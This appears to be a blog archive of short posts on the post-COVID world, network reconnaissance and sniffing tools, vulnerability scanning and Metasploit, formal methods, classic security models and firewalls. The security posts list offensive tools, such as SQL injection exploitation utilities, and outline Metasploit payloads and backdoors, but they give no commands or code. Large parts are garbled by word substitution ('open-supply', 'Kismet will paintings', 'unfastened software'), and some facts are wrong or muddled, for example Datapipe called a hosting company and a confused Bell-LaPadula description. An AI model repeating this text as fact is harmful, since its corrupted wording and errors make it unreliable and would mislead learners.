Wednesday, August 31, 2022

Post-COVID World

The way we study, work, and live has altered because of COVID-19. While some changes are transient, others are permanent. The world after the epidemic will not be exactly like the world before. Thus, there are several discussions about the perspective of the post-COVID world and what should be the challenges around the world.


The world after the COVID-19 disease:

During the time of COVID, a weak medical and healthcare system led to the death of many people. As a result, every country has recognized the value of having a robust healthcare system and is working to implement one. Many nations were impacted as the world's supply systems were disrupted. As a result, numerous nations began making efforts to become self-sufficient. Globalism is being increasingly dominated by nationalism. Until everyone is immunized and eradicated, COVID may become intermittent and be cured like the common flu. If a new virus is found, everyone will be on high alert. Worldwide action will be taken right away to stop upcoming pandemics. Checks for viruses at airports will become standard, and a covid vaccination passport may also be required.

Jobs that can be done from home will increase. Additionally, employees will expect rigorous timing to create a work-life balance. Most jobs that can be done from home currently require availability around the clock. Employees are being worn out as a result. As a result, new laws may be implemented to attain work-life balance. Everyone is now aware of the necessity of an emergency fund. Many people will begin saving money and setting up emergency finance in preparation for the near future turbulence. The value of life and the people we love will increase. Many people will meet up with friends and family regularly because of the times when pandemics prevented us from seeing our loved ones.


The post-COVID world should look like this:

The covid epidemic had a significantly more significant impact on the weaker individuals than on the general population. The majority of those who lost their jobs were unskilled laborers. And because they lacked access to digital gadgets, poor people's kids could not finish their education. Therefore, nations should seek to lessen inequality and close the gap. Protecting those who are vulnerable requires action.


People realized during the lockdown that humans could positively impact the environment. Therefore, promoting sustainable growth can significantly improve living conditions in the post-covid era. It is imperative to increase the number of green jobs.

Because of the more significant population density in metropolitan areas, they became covid hotspots. Better employment options should be available in rural areas in the post-covid era so that we may accomplish the geographic distribution of development.


Summary:

The Covid epidemic brought about some lasting effects. We also need to make additional adjustments, like safeguarding the weak by fostering a more inclusive and equal society. In particular, threat perception, social context, scientific correspondence, personal and group interests adjustment, initiative, stress management, and coping with the post-pandemic COVID-19 situations. Actions that behavioral and sociological theories could support are expected to restrain COVID-19's potentially eradicating influences.

Sunday, June 12, 2022

Network Reconnaissance

Open Port / Service Identification:

In cybersecurity, the term open port refers to a TCP or UDP port number configured to accept packets. In contrast, a port that denies a connection or ignores all packets is a closed port. Port is an integral part of the Internet communication model. All communication over the Internet is exchanged over the port. Each IP address contains two types of ports, a UDP port, and a TCP port, with a specific IP address having up to 65,535 ports each. Internet-dependent services (web browsers, websites, file transfer services, etc.) depend on specific ports to send and receive information. Developers use File Transfer Protocol (FTP) or SSH to run encrypted tunnels between computers and exchange information between hosts.


Once a service runs on a particular port, you cannot run other services on that port. For example, if you start Apache after starting Nginx on port 80, the operation will fail because the port is already in use. Open ports can be compromised if the vulnerability exploits legitimate services or malware or social engineering introduces malicious services into the system. Cybercriminals can use these services with open ports to gain unauthorized access to sensitive data. Closing unused ports reduce the number of attack vectors exposed to your organization and reduce your security risk.


Service identification and system identification:

Service identification and system identification are the third and fourth modules listed in the Information Technology Security Testing section of OSSTMM, respectively. The purpose of these two sections is to list the services running on the TCP or UDP ports that responded in the previous module and identify the target's underlying operating system.


Banner/ version check:

The SMTP banner issued by the mail server did not include the resolved hostname in the server's IP address. The email server responds to connections on port 25 with a text string called an SMTP banner. This string aims to inform the server and the administrator of the information they want to convey to the world. It's good to include the server's name in the SMTP banner to know who the person connecting to using the IP address is talking to. This warning is displayed if the name you provide is not in the same domain as the hostname you get when performing a PTR lookup of the IP address.


For some time, many servers "masked" SMTP banners by replacing letters with asterisks for people outside the network. The logic behind this was often that they didn't want to send information over the network to outsiders for fear of providing them with information that would help them attack the server. The benefits are minimal, and many servers perform banner scans as part of anti-spam, which has a negative cost. If the banner is masked, the tool will display a warning.


Some incoming mail servers may use mismatched or masked banners to indicate potential spam sources in your rating system, but in most cases, it is the only thing that rejects incoming mail. There is no. If you do not have a PTR record, or if the record does not match your hostname, we recommend that you contact your ISP and ask them to set up a reverse (PTR) record that matches your mail server's hostname.


Traffic probe:

In telecommunications, a probe is typically an action or object used to learn the state of a network. For example, send an empty message to see if the target exists. Ping is a standard utility for sending such probes. A probe is a program or other device inserted into a critical point on your network to monitor or collect data about network activity. From the perspective of computer security on the network, probes are attempts to access a computer and its files through known or possible vulnerabilities in the computer system.


Understanding Port and Services tools:

Datapipe - Datapipe has established partnerships with technology companies. Datapipe provides application management, hosting, professional, and security services for medium to large enterprises.

Fpipe - FPipe natively implements port redirection technology on Windows. It also supports User Datagram Protocol (UDP), which Datapipe does not have. FPipe does not require support DLLs or privileged user access. However, it only runs on NT, 2000, and XP platforms.

WinRelay - WinRelay is another Windows-based port redirection tool. It and FPipe share the same functionality, including the ability to define static source ports for redirected traffic. Therefore, it can be used compatible with FPipe on any Windows platform.


Network Reconnaissance:

Network reconnaissance is a term used to test for potential vulnerabilities in computer networks. This may be a legitimate activity by the network owner/operator trying to protect it or apply its terms of use. It can also be a precursor to external attacks on your network.

Nmap - Nmap is a network scanner developed by Gordon Lyon. Nmap is used to discover hosts and services on your computer network by sending packets and analyzing the response. Nmap provides many features for inspecting your computer networks, such as host discovery and service and operating system discovery.

THC-Amap - Amap is an excellent tool for determining which applications listen on a particular port. Their database isn't as extensive as Nmap uses for version detection, but it's worth it if you get a second opinion or Nmap isn't discovering the service. Amap also knows how to parse the Nmap output file. This is another valuable tool from the great people of THC.


Network Sniffers and Injection tools:

A network sniffer is a tool for monitoring the flow of data packets on your computer network. They are also known as packet sniffing, network analyzer, packet analyzer, gossip, or network probe. Network sniffing can also be performed on a hardware device or another software program. It is primarily used to evaluate network traffic and data packets.

· TCPdump - tcpdump is a computer program for data network packet analysis that runs on the command-line interface. This allows users to view TCP / IP and other packets sent and received over the computer's network. tcpdump is distributed under the BSD license and is free software.

· Windump - WinDump is the Windows version of tcpdump, a command-line network analyzer for UNIX. WinDump is fully compatible with tcpdump and can be used to monitor, diagnose, and dump network traffic to disk according to various complex rules. It can be run on Windows 95, 98, ME, NT, 2000, XP, 2003, and Vista. WinDump captures using the WinPcap library and drivers that you can download for free from the WinPcap.org website. WinDump supports 802.11b / g wireless capture and troubleshooting via the Riverbed AirPcap adapter. WinDump is free and released under the BSD-style license.

· Wireshark - Wireshark is a free open-source packet analyzer. It is used for network troubleshooting, analysis, software and communication protocol development, and training. Originally called Ethereal, the project was renamed Wireshark in May 2006 due to brand issues.

· Ettercap - Ettercap is a free open source network security tool for man-in-the-middle attacks on your LAN. It can be used for computer network log analysis and security audits. It works on various Unix-like operating systems such as Linux, Mac OS X, BSD, Solaris, and Microsoft Windows.

· Hping - Hping is an open-supply packet generator and analyzer for the TCP/IP protocol created with the aid of using Salvatore Sanfilippo (additionally called Antirez). It is one of the not unusual place gear used for safety auditing and checking out of firewalls and networks, and become used to take advantage of the idle test scanning technique (additionally invented with the aid of using the hping author), and now carried out with inside the Nmap Security Scanner. The new edition of hping, hping3, is scriptable using the Tcl language and implements an engine for a string-based, human-readable description of TCP/IP packets so that the programmer can write scripts associated with low stage TCP/IP packet manipulation and evaluation in a brief time.

· Kismet - Kismet is a community detector, packet sniffer, and intrusion detection gadget for 802.11 Wi-Fi LANs. Kismet will paintings with any Wi-Fi card, which helps uncooked tracking mode, and may sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. The application runs below Linux, FreeBSD, NetBSD, OpenBSD, and Mac OS X. The customer can also run on Microsoft Windows, although, other than outside drones (see below), the simplest one supported Wi-Fi hardware to be had as packet supply. Distributed below the GNU General Public License, Kismet has unfastened software.


Injection Tools:

This is a list of the best and most popular SQL injection tools:

· SQLMap - Automatic SQL Injection And Database Takeover Tool

· jSQL Injection - Java Tool for Automatic SQL Database Injection

· BBQSQL - A Blind SQL Injection Exploitation Tool

· NoSQLMap - Automated NoSQL Database Pwnage

· Whitewidow - SQL Vulnerability Scanner

· DSSS - Damn Small SQLi Scanner

· explo - Human and Machine Readable Web Vulnerability Testing Format

· Blind-Sql-Bitshifting - Blind SQL Injection via Bitshifting

· Leviathan - Wide Range Mass Audit Toolkit

· Blisqy - Exploit Time-based blind-SQL injection in HTTP-Headers(MySQL/MariaDB)

Thursday, June 09, 2022

Vulnerability scanning


What is a vulnerability scan?

A vulnerability scan assesses the vulnerabilities of computers, internal and external networks, and communication devices that cybercriminals can exploit. This automated activity scans infrastructure targets such as IP addresses for known vulnerabilities and misconfigurations. The outcome Vulnerability Assessment Report helps you quickly identify security vulnerabilities that need to be repaired.


What is the vulnerability scan used for?

Vulnerability testing is an essential part of mitigating an organization's security risks. Using a vulnerability scanner to identify system vulnerabilities can reduce the attack surface that criminals can exploit and focus your security measures on the most likely target areas. The vulnerability Scan also helps to periodically scan the IP address range to determine if unauthorized services are exposed or if redundant IP addresses are being used.


How does the vulnerability test work?

There are two main types of vulnerability scans.

Unauthenticated scans detect security perimeter vulnerabilities. Authenticated scans use privileged credentials to further find security vulnerabilities in the internal network. Regardless of which type you choose, the vulnerability scanning tool uses a database of known vulnerabilities, bugs, anomalies, configuration errors, and potential routes to corporate networks that an attacker could exploit. These databases are continuously updated.


Why is vulnerability scanning necessary?

Vulnerabilities are common to organizations of all sizes. New ones are constantly being discovered or may be introduced due to system changes. Criminal hackers use automated tools to identify and exploit known vulnerabilities to access unsecured systems, networks, or data. It's easy to exploit the vulnerability with automated tools. Attacks are cheap, easy to carry out, and indiscriminate, putting all organizations connected to the Internet at risk. An attacker needs only one vulnerability to access the network. This is why it is essential to patch to address these vulnerabilities. Suppose you do not update your software, firmware, and operating system to the latest version immediately after release. In that case, your system's vulnerabilities will continue to be exploited, and your business will remain vulnerable. Worse, most intruders aren't found until it's too late.


What does the Vulnerability Scan test?

The automated vulnerability scanning tool scans open ports for standard services running on those ports. Identify configuration issues and other vulnerabilities in these services and ensure that you follow best practices: Use TLSv1.2 or later and strong encryption. Next, a vulnerability scan report is generated to highlight the identified item.


Who will perform the vulnerability scan?

IT departments typically perform vulnerability scans if they have the expertise and software. Alternatively, you may want to use an external security service provider such as IT Governance. IT governance scans are performed against targets for which the client has the required permissions for the scan, and users of the service must ensure that they have these permissions. The vulnerability scan is also performed by an attacker who scans the Internet to find entry points to the system or network.


Vulnerability Probe:

Vulnerability probes use scanning technology to scan your organization's network for signs of potential breach risk. However, not all probes are created the same. Doing so can expose your business to cyber risks. There are three ways to conduct vulnerability investigations that continuously discover hidden cyber risks.

1. Show your network like a hacker.

2. Use vulnerability assessment tools that highlight the most imminent risks.

3. Use a continuous vulnerability probe.


Vulnerability examples:

When your pc is attached to an unsecured community, your software program protection may be compromised without positive protocols in place. Forgetting updates, weak product points, and unresolved developer troubles leave your customers extensive open to pc protection vulnerabilities. Here is a listing of numerous vulnerabilities that compromise the integrity, availability, and confidentiality of your customers` products.

Critical mistakes to your customers` pc software program can depart statistics with inside the entire community liable to some malicious threats, including:

· Malware

· Phishing

· Proxies

· Spyware

· Adware

· Botnets

· Spam


Cyber attackers, hackers, and malware can take over your customers` software program, disable it and thieve statistics.

The most common software vulnerabilities are:

· Lack of data encryption

· OS command injection

· SQL injection

· Buffer overflow

· No authentication for important features

· Lack of permission

· Unlimited uploads of dangerous file types

· Rely on untrusted input when making security decisions

· Cross-site scripting and counterfeiting

· Download the code without consistency check

· Use of broken algorithms

· URL redirect to an untrusted website

· Path crossing

· error

· Weak password

· Software that is already infected with a virus

The list grows longer each year as new ways of stealing and corrupting data are discovered.


How to prevent computer vulnerabilities?

· Stay on top of bandwidth usage by sending alerts when your device crosses thresholds.

· Block users from accessing suspicious, confirmed, and insecure websites.

· Set unlock and blocklists to override category-based filters.

· Apply web bandwidth check.

· Filter web activity by tags, categories, and URLs to reveal trends, spikes, and irregularities.

· Conclude with a detailed reporting tool that can analyze browsing activity and demonstrate the effectiveness of web security.

· Identify the risk with iScan online software, show where it is, and rate the risk in dollars


OpenVAS (Open Vulnerability Assessment Scanner):

OpenVAS is a full-featured vulnerability scanner. Its features are powerful for implementing uncertified and certified tests, various high and low-level internet and industry protocols, significant scan performance optimization, and vulnerability testing. Scanners have a long history and get vulnerability detection tests from updated feeds. OpenVAS has been developed and promoted by Greenbone Networks since 2006. As part of the Greenbone Enterprise Appliance, a family of commercial vulnerability management products, scanners, and other open-source modules, form Greenbone Vulnerability Management.


Metasploit:

Metasploit is the world's leading open-source intrusion framework used by security engineers as a development platform for building penetration testing systems and security tools and exploits. This framework makes it easy for both attackers and defenders to hack. Metasploit's various tools, libraries, user interfaces, and modules allow users to configure exploit modules, connect to payloads, point to targets, and launch on target systems. Metasploit's extensive database contains hundreds of exploits and multiple payload options.


Metasploit Penetration Testing begins with the Intelligence Gathering Phase. During this phase, Metasploit integrates with various reconnaissance tools such as Nmap, SNMP scans, Windows patch enumeration, and Nessus to find system vulnerabilities. Once the vulnerability is identified, select the exploit and payload to penetrate the crack in the armor. If the exploit is successful, the payload runs on the target, and the user is given a shell to interact with the payload. One of the most common payloads for attacking Windows systems is Meterpreter. This is an interactive shell that is stored only in memory. Metasploit provides various exploit tools for privilege escalation, packet sniffing, pass-the-hash, keylogger, screen capture, and pivot tools when you access the target computer. The user can also set a permanent backdoor when the target computer restarts.


Networks Vulnerability Scanning:

Network vulnerability scanning identifies vulnerabilities in computers, networks, or other IT resources that are potential targets for exploitation by threat actors. Scan your environment for vulnerabilities to find out about your current risk situation, the effectiveness of your security measures, and the opportunity to improve your defenses by fixing vulnerabilities. Obtaining and deploying the Network Vulnerability Scanner is often the first step in creating a more proactive security program. Building high walls and waiting for a siege is no longer enough to counter modern attackers. Modern security programs need to identify and seal vulnerabilities that can be exploited before attackers can exploit them. The Network Vulnerability Scanner provides a good barometer of your security team's overall success and progress by quickly scanning your network for these vulnerabilities, prioritizing and fixing them.


Network vulnerability scanners should be designed to scan the entire IT infrastructure and identify potential vulnerabilities that could be exploited. To do this, the scanner needs (at least) the following features:

· Scan scheduling that does not affect network availability or performance

· Comprehensive scan based on the most comprehensive list of known vulnerabilities and misconfigurations

· Adaptability and scalability to unique network architectures-this also applies to cloud-based containerized assets

· Identify the greatest and most serious threat to the environment

· Prioritization and risk analysis to better inform vulnerability remediation strategies and report progress


NetCat vs. SoCat:

Netcat and Socat allow you to send simple messages between computers over your network interactively. The following settings allow the client and the server to send data to the other party. It works like a simple ad hoc chat program. Socat can communicate with Netcat, and Netcat can communicate with Socat. Netcat is a network utility that reads and writes data over a network connection. Socat is a relay for bidirectional data transmission between two independent data channels.


Monday, May 30, 2022

Formal Methods

Formal methods are system design techniques that create software and hardware systems using a strictly specified mathematical model. Unlike other design systems, formal methods use mathematical proofs as a complement to system testing to ensure correct operation. As systems become more complex and security becomes an increasingly important issue, a formal approach to system design provides another layer of assurance. It is very important to note that formal validation does not rule out the need for testing. Formal verification can't correct bad design assumptions, but it helps identify flaws in thinking that would otherwise remain unconfirmed. In some cases, engineers report finding a bug in the system after a formal review of the design. Broadly speaking, formal design can be thought of as a three-step process that follows the following scheme.

1. Formal Specification: In the formal specification phase, engineers use a modeling language to strictly define the system. A modeling language is a fixed grammar that allows users to model complex structures from predefined types. The process of this formal specification is similar to the process of converting a word problem into algebraic notation. In many respects, this step in the formal design process is similar to the formal software engineering techniques developed by Rumbaugh, Booch, and others. At the very least, both techniques help engineers clearly define problems, goals, and solutions. However, the formal modeling language is more tightly defined. The formal grammar distinguishes between WFF (a logical expression) and NonWFF (a syntactically incorrect instruction). Already at this stage, the difference between WFF and non-WFF helps specify the design. Several engineers who have used the formal specification have stated that the clarity itself created at this stage is an advantage.

2. Verification: As mentioned above, formal methods differ from other specification systems in that they focus on provability and accuracy. By building a system using a formal specification, the designer is actually developing a set of theorems about his system. By proving these theorems correct, the formal. Verification is a difficult process, largely because even the simplest system has several dozen theorems, each of which has to be proven. Even a traditional mathematical proof is a complex affair, Wiles` proof of Fermat's Last Theorem, for example, took several years after its announcement to be completed. Given the demands of complexity and Moore's law, almost all formal systems use an automated theorem proving tool of some form. These tools can prove simple theorems, verify the semantics of theorems, and provide assistance for verifying more complicated proofs.

3. Implementation: After the model is specified and validated, the model is implemented by converting the specification into code. As the distinction between software and hardware design became narrower, formal methods for designing embedded systems emerged. For example, LARCH has a VHDL implementation. Similarly, hardware systems such as VIPER and AAMP5 processors have been developed using a formal approach.


Key concepts of formal methods:

Provability and automated verification: Formal methods differ from other specification systems in that they focus on accuracy and proof. This is ultimately another measure of system integrity. Evidence is a supplement, not an alternative to testing. Testing is an important part of ensuring the suitability of any system, but it is finite. Testing cannot show that the system is functioning properly. It can only show that the system is working in the tested cases. Testing does not show that the system works outside the tested case, so formal proof is required. Formal proof of computer system is not a new idea. Knuth and Dijkstra have written extensively on this subject, but their proofs are based on traditional mathematical methods. In pure science, evidence is verified through extensive peer review prior to publication. Such techniques are time consuming and far from perfect. It is not uncommon for published proofs to contain errors. Given the cost and time requirements of system engineering, traditional testing techniques are not really applicable. Due to the cost of manual verification, most formal methods use an automated theorem proving system to validate the design. The automated theorem prover can best be described as a mathematical CAD tool. These automatically prove simple theorems and help check more complex theorems.


Advantages:

Formal methods offer additional benefits beyond provability, and these benefits are worth mentioning. However, most of these benefits are available from other systems and usually do not have the sharp learning curve required by formal methods.

Discipline- Formal systems require engineers to think more thoroughly about their designs because of their rigor. In particular, formal justification requires rigorous specification of goals, not just operations. This thorough approach helps identify defective inferences much faster than traditional designs. Formal specification discipline has also been proven in existing systems. For example, an engineer using a PVS system reported that one of the microprocessor designs identified multiple microcode errors.

Precision- Traditionally, as the weaknesses of natural language writing became more apparent, we moved to jargon and formal notation. There is no reason that systems engineering should differ, and there are several formal methods which are used almost exclusively for notation. For engineers designing safety critical systems, the benefits of formal methods lie in their clarity. Unlike many other design approaches, the formal verification requires very clearly defined goals and approaches. In a safety critical system, ambiguity can be extremely dangerous, and one of the primary benefits of the formal approach is the elimination of ambiguity.


Disadvantage:

Bowen points out that formal methods are generally suspected by the professional engineering community, and that preliminary case studies and dissertation tendencies advocating formal methods seem to favor his dissertation. [Bowen93]. There are several reasons why formal methods are not used so often, most of them due to the exaggeration of supporters of formal methods.

Cost- Due to the strict relationship, formal methods are always costlier than traditional approaches to engineering. However, it is arguable how expensive formal verification is, as software cost estimates are more art than science. Formal methods generally have higher initial costs and consume less as the project progresses. This is the opposite of the normal software development cost model.

Computation Model Limitations- This is not a universal problem, but most formal methods introduce some form of computation model and usually do the operations allowed to make the notation elegant and proof of the system. Limit. Unfortunately, from a developer's point of view, these design limitations are usually considered intolerable.

Usability- Traditionally, formal methods have been judged on the basis of their abundance of descriptive models. That is, "good" formal methods describe different systems, and "bad" formal methods have limited ability to describe them. From a theoretical point of view, a comprehensive formal explanation is appealing, but the goal has always been to develop an incredibly complex and subtle explanation language that takes advantage of the difficulties of natural language. Fully formal method case studies often recognize the need for a more comprehensive approach.


The Lightweight approach:

In recent years, the focus has been on formal specification flaws and several alternative approaches have emerged. The traditional view of formal methods as a comprehensive and highly abstracted scheme has led to formal methods being inclusive, very rigorous and very expensive. Although attractive in theory, formal methods have generally been ignored by engineers in this area. A lightweight approach to formal design recognizes that formal methods are not a panacea. There are areas where formal methods are useful and areas where formal specifications are not. Lightweight designs use formal methods in specific locations and can be used in different subsystems. Ideally, take advantage of each method. In such systems, Petri nets can be used to describe communication protocols and LARCH systems can be used to model data storage. For the rest of the system, the formal specification can be omitted altogether. For example, you can use the rapid prototyping system and customer interviews to improve the user interface.


Available tools, techniques, and metrics

Larch: Unlike most formal systems, LARCH provides two levels of specification. A general high-level modeling language, and a collection of implementation dialects designed to work with specific programming languages.

SML: Standard Meta-Language is a strongly typed functional programming language originally designed for exploring ideas in type theory. SML has become the formal methods workhorse because of its strong typing and provability features.

HOL: HOL, short for Higher Order Logic, is an automated theorem proving system. As with most automated theorem proving systems, HOL is a computer-aided proof tool: it proves simple theorems and assists in proving more complicated statements, but is still dependent on interaction with a trained operator. HOL has been extensively used for hardware verification, the VIPER chip being a good example.

Petri Nets: Petri Nets are a good example of a very 'light' formal specification. Originally designed for modeling communications, Petri Nets are a graphically simple model for asynchronous processes.

Monday, May 23, 2022

Computer Security models

In particular, the security model defines the relationship between important security aspects and operating system performance. The computer security model is a scheme for establishing and enforcing security policies. The security model may be based on a formal access right model, computational model, distributed computing model, or it may have no specific rationale. Here are some security models.



Bell-LaPadula Model:


The BellLaPadula model was originally developed by the US Department of Defense (DoD). This model is the first mathematical model of a layered security policy that explains the concept of secure states and forced access methods. This ensures that data flows only in a way that is designed to be confidential without interrupting system policies.


The BellLaPadula has several rules and properties defined below.


Simple security features: "Do not read safely". A subject with a specific clearance level that cannot read higher classification level objects. For example, a subject with secret clearance cannot be reached by a top secret object.


Security Asset: "Don't Write"; This is a higher release level topic and cannot be described at a lower classification level. For example, a subject that subscribes to a higher-class secret system cannot forward email to the secret system.


Strong Quiet Characteristics: The security label does not change while the system is functioning.


Weak hibernate property: Security tags are not modified to conflict with well-defined security properties.



Biba Model:

The Biba model is a bit like BLP, but it doesn't focus on confidentiality. Consistency is the main focus of the Biba model and is often used for consistency where confidentiality is more important. It's easy to think of reversing the BLP implementation. Confidentiality is a major concern of many governments, but most companies want to ensure that data security integrity is maintained at the highest level. Biba is the pattern of choice when guaranteeing integrity is important. The two main rules of the Biba model are the simple axiom of completeness and the axiom of completeness.


Simple Integrity Axiom: (No reading) Subjects with a certain clearance level will not be able to read lower classification information. This helps subjects access important data with a lower level of integrity. This prevents malicious information from low integrity levels from working and ensures integrity.


Consistency Axiom: (No Write) Release level subjects cannot write information to higher classifications. This allows subjects to share important information up to a higher level of integrity than change releases. This protects integrity by preventing defective materials from advancing to higher levels of integrity.



Clark Wilson Model:


The Clark-Wilson model deals with two types of objects, one of which is called CDI and UDI. H. Restricted and unrestricted data items. There are also two types of relationships. One is IVP, which means the integrity check procedure, and the other is TP. H. Transaction procedure. The role of the IVP is to ensure that the TP that causes the CDI is functioning properly and has a valid conversion certificate for all TPs. Only TPs approved can control the CDI here. In other words, this integrity model must be properly implemented to protect the integrity of information and ensure properly formatted transactions.



Brewer and Nash Model:


Also known as the Great Wall model, this model is used to avoid conflicts of interest by allowing the following people: B. Consultant, registration with multiple COIs d. H. Conflicting interest categories are prohibited. Changes to access control policies depend on user behavior. This means that the person who accesses the information cannot access the other person's data or the same person's data is not available.



Harrison Ruzzo Ullman Model:


The Harrison Luzzo Ulman model is also considered an addendum to the BLP model. The BellLaPadula model does not have a system for changing permissions or creating and deleting subjects and objects. The Harrison Ruzzo Ullman model addresses these issues by approving access assignment structures and verifying compliance with specified policies, thereby preventing unauthorized access. The Harrison Ruzzo Ullman model can be implemented via access control or feature lists.

Tuesday, May 17, 2022

Firewall and packet filters

A firewall is a network security device that monitors and filters incoming and outgoing network traffic based on your organization's pre-determined security policies. Basically, a firewall is basically a barrier between your private internal network and the public Internet.

Packet filtering is a firewall technology used to monitor outgoing and incoming packets and control network access by allowing or stopping packets based on source and destination IP addresses, protocols, and ports.

Firewalls have been the first and most reliable line of defense in network security for over 30 years. Firewalls first appeared in the late 1980s. They were initially thought of as packet filters. These packet filters were nothing more than network settings between computers. The main function of these packet filtering firewalls was to look for packets or bytes sent between different computers. Although firewalls are becoming more sophisticated due to ongoing development, such packet filter firewalls are still used in legacy systems. When technology was introduced, GilShwed of Check Point Technologies introduced the first stateful inspection firewall in 1993. It was named FireWall1. In 2000, Netscreen released a dedicated firewall appliance. With faster internet speeds, lower latency, and higher throughput at lower cost, it became popular and was quickly adopted by businesses.

How a Firewall Protects a Network?

The firewall system analyzes network traffic based on predefined rules. Then filter the traffic to prevent it from coming from untrusted or suspicious sources. Allow only inbound traffic that is configured to accept. Normally, a firewall intercepts network traffic at a computer entry point called a port. Firewalls perform this task by allowing or blocking certain data packets (a unit of communication sent over a digital network) based on predefined security rules. Inbound traffic is only allowed from trusted IP addresses or sources.

Search Aptipedia